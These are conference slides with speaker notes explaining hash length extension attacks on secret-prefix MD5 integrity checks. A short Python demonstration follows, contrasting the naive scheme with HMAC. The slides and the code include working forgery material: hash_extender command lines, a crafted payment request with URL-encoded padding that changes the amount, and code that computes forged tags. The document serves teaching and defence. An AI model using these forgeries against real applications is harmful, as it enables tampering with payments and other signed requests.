Hash Length Extension Attacks
Jerome Smith
CamSec April 2017
Introduction
• An application uses this scheme as an integrity check:
hash($secret + $message)
// where + denotes concatenation
• Whenever the message is potentially subject to interference, the hash is sent alongside
• The theory goes that any message tampering will be detected
• But this is potentially vulnerable to a “hash length extension attack”
• Secret prefix
• Attacker knows message and hash
• Vulnerable algorithm, e.g. MD5, SHA-1, SHA-256, SHA-512 (not SHA-384)
• Thanks to Soroush Dalili @irsdl
What makes a hash vulnerable?
• The hash algorithm chews on the input
• At the end, the internal state of the hash algorithm is the hash it spits out
• We can set the internal state of the hash algorithm to start from this point
• We can then feed in more input
• We now have a hash for a longer message that starts with the original input
• It doesn’t matter if the input began with a secret, we don’t need to know it
Exploitation
• Sounds great, doesn’t it?
POST /transfer HTTP/1.1
account_from=10203040&account_to=90807060&amount=100&hash=AABBCC112233
// where hash = MD5("SECERET1020304090807060100")
• So we set our MD5 state to AABBCC112233, feed in a 0 and get a new hash
• This will “validate”:
account_from=10203040&account_to=90807060&amount=1000&hash=DDEEFF445566
// where hash = MD5("SECERET10203040908070601000")
• Unfortunately it’s not that simple
Deep dive
• MD5 is a block-based algorithm
• Padding is used to prepare the input before it’s digested
• Different algorithms use different schemes
• Take a message M
• The input that MD5 works on is:
M + PADDING + LENGTH_OF_M
• This will be some whole number of blocks in length
• What does that mean for our attack?
What’s really going on
account_from=10203040&account_to=90807060&amount=1000&hash=DDEEFF445566
• We’d like hash = MD5("SECERET10203040908070601000")
• When we run our hash length extension attack, the input to the hash is really:
"SECERET1020304090807060100" + PADDING + LENGTH + "0" + PADDING + LENGTH
• The “message” we have a valid hash for is:
"SECERET1020304090807060100" + PADDING + LENGTH + "0"
• The app is checking hash($secret + $account_from + $account_to + $amount)
• We need to preserve account_from=10203040&account_to=90807060
• So that leaves amount="100" + PADDING + LENGTH + "0"
• The first PADDING + LENGTH was originally “metadata”: it’s now part of the data
• The crafted input isn’t tolerated in context
Demo
• That’s not to say it can never work
seller_id=1234&reference=widget&amount=145.20&hash=75b145717ad82cfefdcd740683e182f0
// where hash = MD5($secret + $seller_id + $reference + $amount)
//            = MD5($secret + "1234widget145.20")
//            = MD5($secret + "1234widget145.20" + PADDING + LENGTH)
• So what about
seller_id=1234&reference=widget145.20PADDINGLENGTH&amount=0.99&hash=398e6d69a7fdf27744bd55cfdfc9fdb4
// where hash = MD5($secret + "1234widget145.20" + PADDING + LENGTH + "0.99")
• This will work if the app accepts the weird reference value
• https://github.com/iagox86/hash_extender
./hash_extender --data 1234widget145.20 --secret-min 8 --secret-max 12 --append 0.99 --signature 75b145717ad82cfefdcd740683e182f0 --format md5
Final Thoughts
• Not always exploitable – but when it is, impact can be high
• Tricky to find in a pure black box test
• If the hash scheme used a delimiter, the attack would still work
• Just makes it harder to find – need to know delimiter as well
• But it would stop a simpler attack:
seller_id=1234&reference=widget&amount=145.20&hash=75b145717ad82cfefdcd740683e182f0
seller_id=1234&reference=widget1&amount=45.20&hash=75b145717ad82cfefdcd740683e182f0
• Secret suffix is vulnerable due to collisions
• https://rdist.root.org/2009/10/29/stop-using-unsafe-keyed-hashes-use-hmac/
• We’ve already solved the MAC problem
• “Length Extension Attacks” Burp App – not tested
Questions?


Editor's Notes

  1. For MD5: PADDING is 0x80 plus null bytes; LENGTH is the length in bits in a little-endian 8-byte field.
  2. PADDING and LENGTH are not necessarily printable bytes and make no sense in the context of the app.
  3. Output of hash_extender is ASCII hex of $data + PADDING + LENGTH + $append.
     PADDING starts 0x800000…
     LENGTH is length($secret + $data) in bits (“SUPERSECRET1234widget145.20” = 27 bytes = 216 bits = 0xD8).
     It needs the “data” parameter so it knows how much PADDING and LENGTH to tack on (technically this could just be a number, but the output includes that data).
     Output differs with the length of the secret, as longer secret -> shorter padding and shorter length, but the “new signature”, i.e. the new hash, is the same, as we’re winding on the hash from the same start point (the given hash) with the same data appended.
  4. A delimiter stops parameter manipulation when concatenation is used. It doesn’t stop hash length extension if the delimiter is known…
     /hash/pay-delim.php
     seller_id=1234&reference=widget&amount=145.20&hash=f9243d9e5b806d8bb3e5746024f6c124
     App is calculating: MD5($secret + ":1234:widget:145.20")
     Of course actually it’s calculating: MD5($secret + ":1234:widget:145.20" + PADDING + LENGTH)
     ./hash_extender --data :1234:widget:145.20 --secret-min 8 --secret-max 12 --append :0.99 --signature f9243d9e5b806d8bb3e5746024f6c124 --format md5
     seller_id=1234&reference=widget:145.20%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%f0%00%00%00%00%00%00%00&amount=0.99&hash=05c695020d4e3bba16071d6c8b514b3a
     App calculates MD5($secret + ":1234:widget:145.20" + PADDING + LENGTH + ":0.99")
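
Added example, not part of the original slides or notes: a self-contained check that the padding described in notes 1 and 3 is what lets hash($secret + $message) be wound on, and that an HMAC verifier rejects the same input. The function names are made up for this sketch, the MD5 routine is a plain RFC 1321 implementation written here so the state can be set, and the secret and fields are the demo values from the notes with tags computed locally.

```python
import hashlib
import hmac
import math
import struct

# MD5 constants (RFC 1321): per-round shifts, sine-derived table, initial state.
S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
K = [int(abs(math.sin(i + 1)) * 2**32) & 0xFFFFFFFF for i in range(64)]
IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
SECRET = b"SUPERSECRET"  # demo secret from the speaker notes; only the verifier uses it


def md5_padding(msg_len):
    """PADDING + LENGTH for msg_len bytes: 0x80, nulls, bit length as 8 bytes little-endian."""
    return b"\x80" + b"\x00" * ((55 - msg_len) % 64) + struct.pack("<Q", msg_len * 8)


def _compress(state, block):
    """One MD5 block step: mix a 64-byte block into the 4-word state."""
    a, b, c, d = state
    m = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + K[i] + m[g]) & 0xFFFFFFFF
        a, d, c = d, c, b
        b = (b + ((f << S[i]) | (f >> (32 - S[i])))) & 0xFFFFFFFF
    return tuple((x + y) & 0xFFFFFFFF for x, y in zip(state, (a, b, c, d)))


def md5_from_state(state, data, prior_len):
    """Digest `data` starting from `state`, as if prior_len bytes (a multiple of 64) came first."""
    data += md5_padding(prior_len + len(data))
    for i in range(0, len(data), 64):
        state = _compress(state, data[i:i + 64])
    return struct.pack("<4I", *state).hex()


def naive_mac(message):
    """The scheme from the slides: hash($secret + $message)."""
    return hashlib.md5(SECRET + message).hexdigest()


def naive_verify(message, tag):
    return hmac.compare_digest(naive_mac(message), tag)


def hmac_verify(message, tag):
    # HMAC-MD5 only to compare like with like; new designs would use HMAC-SHA-256.
    return hmac.compare_digest(hmac.new(SECRET, message, hashlib.md5).hexdigest(), tag)


def extend(data, tag, append, secret_len):
    """Wind a tag on without the secret: the old PADDING + LENGTH becomes part of the data."""
    glue = md5_padding(secret_len + len(data))
    state = struct.unpack("<4I", bytes.fromhex(tag))  # the hash is the internal state
    prior = secret_len + len(data) + len(glue)
    return data + glue + append, md5_from_state(state, append, prior)


def check_schemes():
    """Run the same extension against both verifiers and report which one accepts it."""
    data, append = b"1234widget145.20", b"0.99"
    forged, forged_tag = extend(data, naive_mac(data), append, len(SECRET))
    hm_tag = hmac.new(SECRET, data, hashlib.md5).hexdigest()
    _, hm_forged_tag = extend(data, hm_tag, append, len(SECRET))
    return {
        "naive_accepts_extended": naive_verify(forged, forged_tag),
        "hmac_accepts_extended": hmac_verify(forged, hm_forged_tag),
    }


if __name__ == "__main__":
    print(md5_padding(27).hex())  # glue for the 27-byte input in note 3
    print(check_schemes())
```

The glue printed for the 27-byte input ends in the 0xD8 length from note 3, and only the secret-prefix verifier accepts the extended message.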